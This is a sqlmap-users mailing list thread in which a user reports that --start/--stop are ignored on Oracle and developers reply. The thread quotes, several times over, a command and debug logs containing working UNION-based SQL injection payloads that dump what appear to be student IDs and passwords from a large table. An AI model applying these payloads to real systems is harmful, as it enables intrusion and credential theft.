Thread: [sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)
Brought to you by:
inquisb
From: David G. <sk...@gm...> - 2010-04-24 02:02:30
|
Syntax that had problems: $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v 2 sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 22:52:50 [22:52:50] [DEBUG] initializing the configuration [22:52:50] [DEBUG] initializing the knowledge base [22:52:50] [DEBUG] cleaning up configuration parameters [22:52:50] [DEBUG] setting the HTTP timeout [22:52:50] [DEBUG] setting the HTTP method to GET [22:52:50] [DEBUG] creating HTTP requests opener object [22:52:50] [DEBUG] parsing XML queries file [22:52:50] [INFO] using '/path/session' as session file [22:52:50] [INFO] resuming injection point 'GET' from session file [22:52:50] [INFO] resuming injection parameter 'a' from session file [22:52:50] [INFO] resuming injection type 'stringsingle' from session file [22:52:50] [INFO] resuming 0 number of parenthesis from session file [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file [22:52:50] [INFO] resuming union comment '--' from session file [22:52:50] [INFO] resuming union count 15 from session file [22:52:50] [INFO] resuming union position 1 from session file [22:52:50] [INFO] resuming union false condition 1 from session file [22:52:50] [INFO] testing connection to the target url [22:52:50] [DEBUG] got HTTP error code: 500 [22:52:50] [WARNING] the testable parameter 'a' you provided is not into the Cookie [22:52:50] [INFO] testing for parenthesis on injectable parameter [22:52:50] [DEBUG] skipping test for MySQL [22:52:50] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Oracle [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS' as database name [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table 'ALU_ALUNOS' on database 'USERS' [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are in front of a partial inband sql injection [22:52:50] [INFO] read from file '/path': 344305 [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM ALU_ALUNOS-- AND 'RFOj'='RFOj [22:52:51] [DEBUG] performed 1 queries in 0 seconds [22:52:51] [INFO] the SQL query provided returns 344305 entries [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- AND 'qGli'='qGli [22:52:51] [DEBUG] performed 2 queries in 0 seconds [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2-- AND 'EXyf'='EXyf [22:52:53] [DEBUG] performed 3 queries in 1 seconds [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3-- AND 'CLyw'='CLyw [22:52:56] [DEBUG] performed 4 queries in 2 seconds [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4-- AND 'nHQn'='nHQn [22:52:57] [DEBUG] performed 5 queries in 0 seconds [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5-- AND 'iNmX'='iNmX [22:52:58] [DEBUG] performed 6 queries in 1 seconds [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6-- AND 'mVQM'='mVQM [22:52:58] [DEBUG] performed 7 queries in 0 seconds [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7-- AND 'FuqF'='FuqF [22:52:59] [DEBUG] performed 8 queries in 0 seconds [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8-- AND 'utPd'='utPd [22:53:01] [DEBUG] performed 9 queries in 2 seconds [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9-- AND 'ilBw'='ilBw [22:53:03] [DEBUG] performed 10 queries in 2 seconds [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10-- AND 'YxAK'='YxAK ^C [22:53:04] [ERROR] user aborted [*] shutting down at: 22:53:04 As you can see, it will not stop consultation until the fourth, ignoring parameters passed in ("--start" and "--stop"). I gave ctrl + c in the tenth query. Am I doing something wrong or is it anyway? $ svn info Path: . URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap Repository Root: https://svn.sqlmap.org/sqlmap Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb Revision: 1588 Node Kind: directory Schedule: normal Last Changed Author: inquisb Last Changed Rev: 1588 Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010) -- David Gomes Guimarães |
From: Miroslav S. <mir...@gm...> - 2010-04-26 08:59:57
|
you've provided --start 0, while it needs to be >0. we'll add the proper warning for this into runtime. kind regards. On Sat, Apr 24, 2010 at 4:02 AM, David Guimaraes <sk...@gm...> wrote: > Syntax that had problems: > > $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a > --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v > 2 > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:52:50 > > [22:52:50] [DEBUG] initializing the configuration > [22:52:50] [DEBUG] initializing the knowledge base > [22:52:50] [DEBUG] cleaning up configuration parameters > [22:52:50] [DEBUG] setting the HTTP timeout > [22:52:50] [DEBUG] setting the HTTP method to GET > [22:52:50] [DEBUG] creating HTTP requests opener object > [22:52:50] [DEBUG] parsing XML queries file > [22:52:50] [INFO] using '/path/session' as session file > [22:52:50] [INFO] resuming injection point 'GET' from session file > [22:52:50] [INFO] resuming injection parameter 'a' from session file > [22:52:50] [INFO] resuming injection type 'stringsingle' from session file > [22:52:50] [INFO] resuming 0 number of parenthesis from session file > [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file > [22:52:50] [INFO] resuming union comment '--' from session file > [22:52:50] [INFO] resuming union count 15 from session file > [22:52:50] [INFO] resuming union position 1 from session file > [22:52:50] [INFO] resuming union false condition 1 from session file > [22:52:50] [INFO] testing connection to the target url > [22:52:50] [DEBUG] got HTTP error code: 500 > [22:52:50] [WARNING] the testable parameter 'a' you provided is not into the > Cookie > [22:52:50] [INFO] testing for parenthesis on injectable parameter > [22:52:50] [DEBUG] skipping test for MySQL > [22:52:50] [INFO] the back-end DBMS is Oracle > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Oracle > > [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you > provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS' > as database name > [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table > 'ALU_ALUNOS' on database 'USERS' > [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will > now unpack it into distinct queries to be able to retrieve the output even > if we are in front of a partial inband sql injection > [22:52:50] [INFO] read from file '/path': 344305 > [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > ALU_ALUNOS-- AND 'RFOj'='RFOj > [22:52:51] [DEBUG] performed 1 queries in 0 seconds > [22:52:51] [INFO] the SQL query provided returns 344305 entries > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- > AND 'qGli'='qGli > [22:52:51] [DEBUG] performed 2 queries in 0 seconds > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2-- > AND 'EXyf'='EXyf > [22:52:53] [DEBUG] performed 3 queries in 1 seconds > [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3-- > AND 'CLyw'='CLyw > [22:52:56] [DEBUG] performed 4 queries in 2 seconds > [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4-- > AND 'nHQn'='nHQn > [22:52:57] [DEBUG] performed 5 queries in 0 seconds > [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5-- > AND 'iNmX'='iNmX > [22:52:58] [DEBUG] performed 6 queries in 1 seconds > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6-- > AND 'mVQM'='mVQM > [22:52:58] [DEBUG] performed 7 queries in 0 seconds > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7-- > AND 'FuqF'='FuqF > [22:52:59] [DEBUG] performed 8 queries in 0 seconds > [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8-- > AND 'utPd'='utPd > [22:53:01] [DEBUG] performed 9 queries in 2 seconds > [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9-- > AND 'ilBw'='ilBw > [22:53:03] [DEBUG] performed 10 queries in 2 seconds > [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10-- > AND 'YxAK'='YxAK > ^C > [22:53:04] [ERROR] user aborted > > [*] shutting down at: 22:53:04 > > > > As you can see, it will not stop consultation until the fourth, ignoring > parameters passed in ("--start" and "--stop"). > > I gave ctrl + c in the tenth query. > > Am I doing something wrong or is it anyway? > > $ svn info > Path: . > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap > Repository Root: https://svn.sqlmap.org/sqlmap > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb > Revision: 1588 > Node Kind: directory > Schedule: normal > Last Changed Author: inquisb > Last Changed Rev: 1588 > Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010) > > -- > David Gomes Guimarães > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: David G. <sk...@gm...> - 2010-04-26 16:42:48
|
Mirvoslav: Don't work even passing --start 1 or --start 3 or anything in a table with X rows.. i don't know if this is a oracle error or other thing.. sqlmap simply ignores the parameter... tested and re-tested... if the table has 100 rows and I pass --start to him to read until the tenth, he will read them all... On Mon, Apr 26, 2010 at 6:27 AM, Bernardo Damele A. G. < > ber...@gm...> wrote: > >> Did you try without providing --start and --stop? Let me know please >> if it correctly dump entries or not. >> >> Bernardo >> >> >> On Sat, Apr 24, 2010 at 04:02, David Guimaraes <sk...@gm...> wrote: >> > Syntax that had problems: >> > >> > $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a >> > --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop >> 4 -v >> > 2 >> > >> > sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> > http://sqlmap.sourceforge.net >> > >> > [*] starting at: 22:52:50 >> > >> > [22:52:50] [DEBUG] initializing the configuration >> > [22:52:50] [DEBUG] initializing the knowledge base >> > [22:52:50] [DEBUG] cleaning up configuration parameters >> > [22:52:50] [DEBUG] setting the HTTP timeout >> > [22:52:50] [DEBUG] setting the HTTP method to GET >> > [22:52:50] [DEBUG] creating HTTP requests opener object >> > [22:52:50] [DEBUG] parsing XML queries file >> > [22:52:50] [INFO] using '/path/session' as session file >> > [22:52:50] [INFO] resuming injection point 'GET' from session file >> > [22:52:50] [INFO] resuming injection parameter 'a' from session file >> > [22:52:50] [INFO] resuming injection type 'stringsingle' from session >> file >> > [22:52:50] [INFO] resuming 0 number of parenthesis from session file >> > [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file >> > [22:52:50] [INFO] resuming union comment '--' from session file >> > [22:52:50] [INFO] resuming union count 15 from session file >> > [22:52:50] [INFO] resuming union position 1 from session file >> > [22:52:50] [INFO] resuming union false condition 1 from session file >> > [22:52:50] [INFO] testing connection to the target url >> > [22:52:50] [DEBUG] got HTTP error code: 500 >> > [22:52:50] [WARNING] the testable parameter 'a' you provided is not into >> the >> > Cookie >> > [22:52:50] [INFO] testing for parenthesis on injectable parameter >> > [22:52:50] [DEBUG] skipping test for MySQL >> > [22:52:50] [INFO] the back-end DBMS is Oracle >> > web server operating system: Windows 2000 >> > web application technology: ASP.NET <http://asp.net/>, Microsoft IIS >> 6.0, ASP >> > back-end DBMS: Oracle >> > >> > [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you >> > provide a TABLESPACE_NAME as database name. sqlmap is going to use >> 'USERS' >> > as database name >> > [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table >> > 'ALU_ALUNOS' on database 'USERS' >> > [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap >> will >> > now unpack it into distinct queries to be able to retrieve the output >> even >> > if we are in front of a partial inband sql injection >> > [22:52:50] [INFO] read from file '/path': 344305 >> > [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, >> > >> CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > ALU_ALUNOS-- AND 'RFOj'='RFOj >> > [22:52:51] [DEBUG] performed 1 queries in 0 seconds >> > [22:52:51] [INFO] the SQL query provided returns 344305 entries >> > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=1-- >> > AND 'qGli'='qGli >> > [22:52:51] [DEBUG] performed 2 queries in 0 seconds >> > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=2-- >> > AND 'EXyf'='EXyf >> > [22:52:53] [DEBUG] performed 3 queries in 1 seconds >> > [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=3-- >> > AND 'CLyw'='CLyw >> > [22:52:56] [DEBUG] performed 4 queries in 2 seconds >> > [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=4-- >> > AND 'nHQn'='nHQn >> > [22:52:57] [DEBUG] performed 5 queries in 0 seconds >> > [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> 